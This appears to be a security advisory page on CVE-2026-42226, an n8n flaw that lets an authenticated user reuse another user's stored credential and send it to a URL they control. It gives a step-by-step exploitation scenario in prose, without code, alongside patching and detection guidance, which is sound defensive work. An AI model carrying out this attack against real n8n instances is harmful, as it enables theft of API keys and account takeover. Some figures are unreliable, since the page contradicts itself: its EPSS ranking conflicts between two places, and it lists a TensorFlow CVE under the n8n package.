AI Threat Alert

CVE-2026-42226: n8n: IDOR exposes cross-user API key exfiltration

GHSA-r4v6-9fqc-w5jr UNKNOWN
Published April 29, 2026
CISO Take

n8n's dynamic-node-parameters endpoints failed to verify that the requesting user was authorized to reference a specific credential, allowing any authenticated user with shared workflow access to supply a foreign credential ID and force the backend to decrypt and use that credential against an attacker-controlled URL—leaking the raw API key. For organizations using n8n as an AI automation hub, this means every stored credential (LLM API keys, database passwords, OAuth tokens) is potentially accessible to any other authenticated user in the workspace. The package carries 75 prior CVEs, an OpenSSF score of 6/10, and an EPSS placing it in the top 85% of exploitation likelihood—making this a high-priority patch with meaningful exploitation risk despite no public exploit yet. Upgrade to n8n 1.123.33, 2.17.5, or 2.18.0 immediately; until patched, audit shared workflow permissions and rotate all stored credentials.

Sources: NVD GitHub Advisory EPSS OpenSSF ATLAS

What is the risk?

HIGH. The vulnerability requires only authenticated access—not admin privileges—and exploits a simple authorization check bypass (IDOR pattern) against credential storage. In AI automation environments, n8n typically holds API keys for LLMs (OpenAI, Anthropic), vector databases, and SaaS integrations, making credential theft high-impact. No public exploit exists, but the attack pattern is trivially reproducible by any developer familiar with REST APIs. The EPSS top-85% placement, combined with n8n's 75 historical CVEs and moderate OpenSSF score (6/10), indicates a platform with recurring security debt in high-value credential territory.

How does the attack unfold?

Credential Enumeration
Authenticated attacker inspects accessible shared n8n workflows or enumerates the credential API to discover credential IDs belonging to other users in the workspace.
AML.T0007
Authorization Bypass
Attacker calls the dynamic-node-parameters endpoint supplying a foreign credential ID in the request body, bypassing the absent authorization check (CWE-862).
AML.T0106
Forced Credential Exfiltration
n8n backend decrypts the target user's credential and executes an HTTP helper request to an attacker-controlled URL with the credential embedded as authentication material.
AML.T0086
Downstream AI Service Compromise
Attacker captures the raw API key from server logs and uses it to access the victim's LLM provider account, vector database, or other connected AI services for further exploitation.
AML.T0055

What systems are affected?

Package Ecosystem Vulnerable Range Patched
n8n npm >= 2.17.0, < 2.17.5 2.17.5
193.4K OpenSSF 6.6 Pushed 4d ago 54% patched ~7d to patch Full package profile →

Do you use n8n? You're affected.

How severe is it?

CVSS 3.1
N/A
EPSS
0.3%
chance of exploitation in 30 days
Higher than 17% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
No known exploitation
Sophistication
Trivial

What should I do?

5 steps

  1. PATCH

    Upgrade to n8n 1.123.33, 2.17.5, or 2.18.0 immediately.

  2. ROTATE

    Rotate all credentials stored in n8n (API keys, OAuth tokens, database passwords) regardless of whether exploitation is confirmed—treat all stored secrets as potentially compromised.

  3. AUDIT

    Review shared workflow permissions and restrict to minimum-privilege users pending patch deployment.

  4. DETECT

    Review n8n backend HTTP request logs for outbound calls to unexpected external URLs originating from the dynamic-node-parameters execution path; flag any credential-bearing requests to non-whitelisted domains.

  5. ISOLATE

    If patching is delayed, disable shared workflow access or operate n8n in single-user mode as a temporary compensating control.

What does CISA's SSVC say?

Decision Track
Exploitation none
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Auth Bypass Data Extraction Privacy Violation Agent API Framework AML.T0012 AML.T0049 AML.T0055 AML.T0083 AML.T0086 AML.T0106

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, Robustness and Cybersecurity Article 9 - Risk Management System
ISO 42001
A.8.3 - AI System Access Control A.9.2 - AI System Security Testing
NIST AI RMF
GOVERN-1.2 - AI Risk Policies and Procedures MANAGE-2.2 - Mechanisms to Sustain Risk Controls
OWASP LLM Top 10
LLM02:2025 - Sensitive Information Disclosure LLM06:2025 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-42226?

n8n's dynamic-node-parameters endpoints failed to verify that the requesting user was authorized to reference a specific credential, allowing any authenticated user with shared workflow access to supply a foreign credential ID and force the backend to decrypt and use that credential against an attacker-controlled URL—leaking the raw API key. For organizations using n8n as an AI automation hub, this means every stored credential (LLM API keys, database passwords, OAuth tokens) is potentially accessible to any other authenticated user in the workspace. The package carries 75 prior CVEs, an OpenSSF score of 6/10, and an EPSS placing it in the top 85% of exploitation likelihood—making this a high-priority patch with meaningful exploitation risk despite no public exploit yet. Upgrade to n8n 1.123.33, 2.17.5, or 2.18.0 immediately; until patched, audit shared workflow permissions and rotate all stored credentials.

Is CVE-2026-42226 actively exploited?

No confirmed active exploitation of CVE-2026-42226 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-42226?

1. PATCH: Upgrade to n8n 1.123.33, 2.17.5, or 2.18.0 immediately. 2. ROTATE: Rotate all credentials stored in n8n (API keys, OAuth tokens, database passwords) regardless of whether exploitation is confirmed—treat all stored secrets as potentially compromised. 3. AUDIT: Review shared workflow permissions and restrict to minimum-privilege users pending patch deployment. 4. DETECT: Review n8n backend HTTP request logs for outbound calls to unexpected external URLs originating from the dynamic-node-parameters execution path; flag any credential-bearing requests to non-whitelisted domains. 5. ISOLATE: If patching is delayed, disable shared workflow access or operate n8n in single-user mode as a temporary compensating control.

What systems are affected by CVE-2026-42226?

This vulnerability affects the following AI/ML architecture patterns: AI agent frameworks, Workflow automation pipelines, Multi-tenant AI orchestration platforms, LLM integration hubs, API credential stores and secret management.

What is the CVSS score for CVE-2026-42226?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

AI agent frameworksWorkflow automation pipelinesMulti-tenant AI orchestration platformsLLM integration hubsAPI credential stores and secret management

MITRE ATLAS Techniques

AML.T0012 Valid Accounts
AML.T0049 Exploit Public-Facing Application
AML.T0055 Unsecured Credentials
AML.T0083 Credentials from AI Agent Configuration
AML.T0086 Exfiltration via AI Agent Tool Invocation
AML.T0106 Exploitation for Credential Access

Compliance Controls Affected

EU AI Act: Article 15, Article 9
ISO 42001: A.8.3, A.9.2
NIST AI RMF: GOVERN-1.2, MANAGE-2.2
OWASP LLM Top 10: LLM02:2025, LLM06:2025

What are the technical details?

Original Advisory

n8n is an open source workflow automation platform. Prior to versions 1.123.33 and 2.17.5, the dynamic-node-parameters endpoints did not verify whether the authenticated caller was authorized to use a supplied credential reference. An authenticated user with access to a shared workflow could supply a foreign credential ID in the request body, causing the backend to decrypt and use that credential in a helper execution path where the caller also controls the destination URL. This allowed the caller to force the backend to authenticate against attacker-controlled infrastructure using a credential belonging to another user, effectively exfiltrating a reusable API key. The issue is not limited to any single node type; any node that resolves credentials dynamically through these endpoints may be affected. This issue has been patched in versions 1.123.33, 2.17.5, and 2.18.0.

Exploitation Scenario

An attacker with a legitimate n8n account in a multi-user workspace identifies a shared workflow. Through API enumeration or inspection of accessible workflow configurations, they obtain the credential ID of a high-privilege user—such as an OpenAI API key with billing access or a database password with read/write permissions. The attacker calls the dynamic-node-parameters endpoint, supplying the foreign credential ID and an attacker-controlled destination URL. The n8n backend decrypts the target user's credential and executes a helper HTTP request to the attacker's server, transmitting the credential as an Authorization header. The attacker captures the raw API key and uses it to access the victim's LLM account, pivot to connected data sources, or exfiltrate proprietary prompt workflows. The entire attack requires only a REST client and knowledge of the target credential ID—no special tooling or AI/ML expertise.

Weaknesses (CWE)

CWE-862 Missing Authorization Primary CWE-862 Missing Authorization Primary

CWE-862 — Missing Authorization: The product does not perform an authorization check when an actor attempts to access a resource or perform an action.

  • [Architecture and Design] Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries. Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
  • [Architecture and Design] Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Source: MITRE CWE corpus.

References

Timeline

Published
April 29, 2026
Last Modified
May 4, 2026
First Seen
April 30, 2026

Related Vulnerabilities

CRITICAL CVE-2026-33663 10.0

n8n: member role steals plaintext HTTP credentials

Same package: n8n
CRITICAL CVE-2026-33660 10.0

TensorFlow: type confusion NPD in tensor conversion

Same package: n8n
CRITICAL CVE-2026-21858 10.0

n8n: Input Validation flaw enables exploitation

Same package: n8n
CRITICAL CVE-2026-27577 9.9

n8n: Code Injection enables RCE

Same package: n8n
CRITICAL CVE-2026-27494 9.9

n8n: security flaw enables exploitation

Same package: n8n
Back to Threat Feed